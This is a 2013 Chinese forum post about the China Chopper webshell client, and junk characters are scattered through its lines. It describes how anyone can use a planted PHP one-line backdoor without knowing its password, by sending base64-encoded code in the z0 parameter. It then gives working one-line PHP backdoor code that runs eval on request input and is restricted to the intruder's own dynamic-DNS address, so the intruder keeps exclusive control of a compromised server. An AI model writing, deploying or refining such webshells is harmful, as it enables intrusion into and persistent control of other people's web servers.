今天试了下“中国菜刀”这款C/S的WEB管理软件,发现一个致命的漏洞9 }- c8 _! b: D/ e! P, c) K* \
' ~/ }) ?! a# N* I) ?: [3 t就算你设置了密码,使用了eval($_REQUEST['moyo']);
* @/ k% n! h$ z- q# H' k M( ], h/ p7 b) e! {0 t
但是别人还是可以在不知道连接密码是moyo的情况下直接使用你的一句话后门5 q4 w. g4 s$ ~. i9 _
+ ?+ V7 X5 D. _) ]% D$ e% p
因为$_REQUEST['moyo']传递的内容是@eval(base64_decode($_POST[z0]));
( }' ^* {2 k4 l6 [9 @' A. H2 a/ {+ @% L# X# O0 b. a. ~ V4 h! b
直接访问 /backdoor.php?z0={BASE64加密后的代码} 就可以执行代码了
9 e! _5 M' W4 e$ m8 |5 ~
6 M0 _+ u8 \- I: M) u+ j不知道是设计缺陷还是故意留的后门
" _8 ]& D% M0 Y
0 s: J) W1 i! B' Z2 d/ F如果有人使用一句话之类的密码,有个小技巧可以避免自己的一句话被人盗用
, @: k3 W. X" A5 ]
& |3 G5 r$ U8 q- u) Q4 W% D6 L本地使用花生壳之类的DDNS软件,比如分配域名是moyo.apiz.org' E/ A; a! f3 @, h" Q: Y. \
5 g2 ~% A2 j N6 b4 L
然后一句话后门这样写
8 M1 i1 j. C& o6 `4 K. t: y% N
$ w1 ]" X1 a5 f2 ? e& A, R<?php $_SERVER['REMOTE_ADDR'] == gethostbyname('moyo.apiz.org') ? @eval($_REQUEST['moyo']) : exit('DENIED') ?>
9 m! v ?) ]1 {7 H8 x这样就可以让一句话后门只允许自己的电脑连接了
. Z; Q" c3 t1 b& [- k2 R) Y/ V2 \- b' [
|
发表于 2013-7-26 12:45:48
收藏
支持
反对